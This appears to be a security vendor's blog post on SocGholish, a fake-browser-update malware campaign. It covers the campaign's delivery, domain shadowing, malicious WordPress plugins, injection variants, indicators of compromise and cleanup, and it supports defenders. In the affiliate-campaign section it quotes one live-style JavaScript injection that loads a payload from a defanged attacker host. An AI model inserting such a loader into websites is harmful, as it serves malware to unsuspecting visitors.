Website malware comes in all shapes and sizes, each with its own unique methods of attack and evasion. One threat making regular headlines is SocGholish, a sophisticated and persistent malware that has been targeting websites for over 7 years.
Understanding how SocGholish operates and learning how to protect against it is essential if you want to mitigate risk and protect your site visitors. In this post, we’ll explain what SocGholish is and explain the red flags and warning signs to look out for. We’ll also reveal common indicators of compromise and steps to prevent a SocGholish malware infection.
Contents:
SocGholish is a sophisticated JavaScript malware framework that has been actively used by cybercriminals since at least 2017. The primary purpose of this malware is to trick users into downloading and executing malicious files — often under the guise of critical browser updates.
Once the malicious files are downloaded and executed in the victim’s environment, they deploy various types of malware, including Remote Access Trojans (RATs) and infostealers, which can lead to significant security breaches and financial losses for individuals and organizations.
The impact of SocGholish extends beyond individual computer infections. In fact, it has been linked to some notorious cyberattacks in recent history.
These associations highlight the implications of SocGholish infections and the role they play in larger, coordinated cybercrime activities.
SocGholish operates through a series of deceptive and sophisticated tactics designed to trick users and evade detection.
One of the primary tactics used by SocGholish is the fake browser update scheme. This involves creating malicious websites or compromising legitimate ones to display fake browser update notifications and pop-ups on infected websites.
Notifications are designed to look convincing, often mimicking the design and language of real update prompts from popular browsers like Chrome, Firefox, and Edge.
When a user visits an infected website, they are greeted with a pop-up or banner urging them to update their browser to the latest version for security reasons. The urgency and legitimacy of the message can easily persuade users to follow the instructions, especially if they are not tech-savvy or are in a rush.
If a user falls for the SocGholish fake update prompt, they are directed to download a file, typically in the form of a .zip or .js file. These files are carefully crafted to appear harmless but are, in fact, laden with malware.
If a user clicks on the downloaded JavaScript file, it is executed by the Windows Script Host (wscript). For .zip downloads the user is instructed to decompress and execute the file.
This step requires user interaction, making the malware delivery method a form of social engineering. The success of SocGholish relies heavily on the user’s willingness to follow the deceptive instructions.
Once the malicious file is executed, SocGholish collects information about the environment and sends this data to a Command & Control server (C2). C2 uses this data to decide whether to proceed with deploying various types of secondary malware. These can include remote access trojans (RATs), which allow attackers to gain control of the infected system, information stealers that harvest sensitive data such as credentials and financial information, and Cobalt Strike beacons, which are used for further exploitation and lateral movement within a network.
The deployment of these secondary malware types is often just the beginning. SocGholish infections can serve as the initial entry point for more severe attacks, including ransomware. Attackers may use the access gained through SocGholish to distribute ransomware across a corporate network, encrypting data and demanding a ransom for its release. This can lead to significant operational disruptions and financial losses for affected organizations.
To distribute the malicious files and manage the infected systems, SocGholish employs a technique known as domain shadowing. This involves compromising legitimate domains and adding subdomains that point to malicious servers. These subdomains are used to host the fake update pages and deliver the malware, making it difficult to trace and block the malicious activity.
For example, attackers may compromise a domain registrar account and add an A-record for a subdomain such as update.example.com, which points to a malicious server. This technique leverages the good reputation of the compromised domain to avoid detection by security systems.
Recent waves of SocGholish infections have been found impersonating or leveraging legitimate WordPress plugins. Attackers are bundling malware into otherwise legitimate-looking plugins and using compromised WordPress admin credentials to upload and activate these malicious plugins on victim sites. Once activated, the plugin begins to serve SocGholish payloads, further compromising the website and its visitors. This method allows SocGholish to be distributed stealthily and persistently, often without the administrator’s knowledge.
SocGholish operators often run affiliate programs that encourage third-party hacker groups to load SocGholish scripts onto infected sites. This results in multiple malware campaigns serving SocGholish fake browser updates. We’ve outlined some of the more prevalent examples below.
One of the most notable SocGholish malware campaigns is known as NDSW/NDSX. It consistently ranks among the top detected website malware: our SiteCheck scanner detected NDSW injections on over 110,000 sites in 2023 alone.
This variant typically injects obfuscated JavaScript that begins with if(ndsw===undefined) and is often found nestled at the bottom of .js files on compromised websites. Due to this behavior, it is renowned for affecting a large number of website files.
Some variations of NDSW also use malicious PHP files to hide the NDSX layers, which then obtain the SocGholish payload from a third-party server. This layered approach makes it more challenging to detect and remove the malware, emphasizing the importance of regular website monitoring and thorough code inspections.
A second prevalent type of SocGholish infection is khutmhpx, named after a variable used in its injections. In 2023, khutmhpx was detected on over 20,000 sites. It’s not uncommon to find multiple, sometimes dozens, of khutmhpx injections at the top of infected web pages. Some of these injections may be duplicates, while others use different domains and Keitaro TDS (Traffic Distribution System) URLs.
For this campaign, SocGholish is the main payload — but it’s not the only one. Sometimes it redirects traffic further via VexTrio, adding another layer of complexity to the threat.
In 2024, we have observed increased activity from another SocGholish affiliate using multiple seemingly legitimate domains in their injections. For instance, in the first five months of 2024, two particularly common injections were detected by SiteCheck on approximately 8,700 sites each:
These scripts load the SocGholish payload in the following form:
;(function(v,d,r,y,a,b){a=d.createElement(r);b=d.getElementsByTagName(r)[0];a.async=1;a.src=y;b.parentNode.insertBefore(a,b);})(window,document,'script','hxxps://pluralism.themancav[.]com/lbK9kO6Q3vnxkIeio4aRsueQh7L82d/o+dXbsug=');
This threat actor often injects the script using fake plugins or extra code added into the functions.php file of the active WordPress theme.
These types of injections are particularly insidious because they blend in with legitimate code, making them harder to identify.
Recognizing the red flags and warning signs of a SocGholish infection is essential for preventing further damage. Here are some key indicators of compromise (IoCs) and common techniques used by SocGholish.
One of the most obvious signs of a SocGholish infection is the appearance of unexpected browser update prompts on your web pages. These prompts typically appear as pop-ups or banners urging users to update their browser to the latest version for security reasons.
Unlike legitimate browser updates, which usually occur through the browser’s built-in update mechanism, these fake prompts direct users to download and execute files manually.
If you or your website users encounter such prompts, it’s a clear red flag that your site may be compromised.
Another common indicator of a SocGholish infection is the presence of unfamiliar JavaScript code injected into your website. This malicious code is often obfuscated to avoid detection and can be found in various parts of your website’s source code, including within HTML files, JavaScript files, and even in your website’s database.
Regularly inspecting your website’s code for any unfamiliar or suspicious scripts and running server-level scans can help you identify and remove these injections before they cause further harm. You can leverage automated tools like Sucuri’s server-side scanner to effectively detect malware and save time.
SocGholish often uses domain shadowing to host its malicious payloads. This involves adding subdomains to legitimate domains, which then point to malicious servers. For example, you might find a subdomain like update.website.com that you didn’t create or authorize.
Regularly reviewing your DNS records and subdomains for any unauthorized changes can help you detect and respond to these threats promptly.
SocGholish malware is injected into hacked sites from a variety of different campaigns. Each of them uses different infection vectors and malware placement approaches. Nonetheless, common website cleanup practices are still applicable for addressing most of them.
If your website has been compromised by SocGholish malware, you can follow these to clean up the infection and harden your website to prevent further attacks.
Sucuri’s researchers and remediation analysts have been tracking and removing SocGholish malware from infected environments for over seven years. If you need help identifying and cleaning up malware on your website, our experienced security specialists are always happy to lend a hand.